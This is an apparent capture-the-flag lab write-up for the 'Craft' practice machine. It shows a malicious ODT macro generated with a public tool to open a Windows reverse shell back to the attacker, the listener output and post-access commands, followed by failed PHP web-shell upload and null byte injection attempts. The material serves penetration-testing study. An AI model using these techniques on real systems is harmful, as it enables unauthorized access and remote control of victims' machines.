ODT File Upload
The target web application features a file upload functionality, designed to receive resumes from candidates. The upload.php file explicitly manages this upload process and restricts accepted file types to ODT (Open Document Text) files. Observations suggest that the uploaded files are actively processed by the server, raising the possibility that the system may have Microsoft Office or LibreOffice Suite installed. If this assumption holds true, it opens an avenue for further exploration — specifically, the potential to upload an ODT file containing a malicious macro payload that could be executed during file processing.
Exploit
/Practice/Craft/3-Exploitation/attachments/{1CF6BEEF-C782-4B51-B2BD-0326A293A659}.png)
Really awesome python scripts for generating office document files in various format with a reverse shell payload
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/craft]
└─$ git clone https://github.com/0bfxgh0st/MMG-LO
Cloning into 'MMG-LO'...
remote: Enumerating objects: 226, done.
remote: Counting objects: 100% (135/135), done.
remote: Compressing objects: 100% (93/93), done.
remote: Total 226 (delta 71), reused 75 (delta 40), pack-reused 91 (from 1)
Receiving objects: 100% (226/226), 647.40 KiB | 6.81 MiB/s, done.
Resolving deltas: 100% (111/111), done.Cloning the exploit repo
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/craft]
└─$ python3 MMG-LO/mmg-odt.py windows $tun0 9999
[+] Payload: windows reverse shell
[+] Creating malicious .odt file
Done.Generating a malicious ODT file
Exploitation
/Practice/Craft/3-Exploitation/attachments/{643E38A7-60CA-4D48-AEC0-3890C39D34A8}-1.png)
Uploading
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/craft]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [192.168.45.197] from (UNKNOWN) [192.168.138.169] 49941
PS C:\Program Files\LibreOffice\program>
PS C:\Program Files\LibreOffice\program> whoami
craft\thecybergeek
PS C:\Program Files\LibreOffice\program> hostname
CRAFT
PS C:\Program Files\LibreOffice\program> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::2cf0:b138:c2e1:e87b%5
IPv4 Address. . . . . . . . . . . : 192.168.138.169
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.138.254Initial Foothold established to the target system as the thecybergeek user via client-side attack
PHP Upload to /uploads Directory (Fail)
/Practice/Craft/3-Exploitation/attachments/{CA06CD2E-19C5-4D08-93C9-0F21B9DFD6B4}.png)
/Practice/Craft/3-Exploitation/attachments/{2EC36B1A-89B3-426E-B58C-0E8AF84637EA}.png)
/Practice/Craft/3-Exploitation/attachments/{393FC654-5ADD-49DF-8605-93426C2F6CE3}.png)
Altering the filename to be uploaded to the /uploads directory fails initially due to the file extension
/Practice/Craft/3-Exploitation/attachments/{364C34A9-909D-411C-9452-C9C1F6FBB9FC}.png)
/Practice/Craft/3-Exploitation/attachments/{694D6D38-A75F-47C2-AED0-F616C9B38F80}.png)
uploads/shell.php.odf worked
However, clicking the file just downloads it, not executing it
/Practice/Craft/3-Exploitation/attachments/{457C40A4-FAB2-496E-B045-74F93F536815}.png)
/Practice/Craft/3-Exploitation/attachments/{3573DC93-6B43-4057-9C64-EAB656FF5166}.png)
Null byte injection failed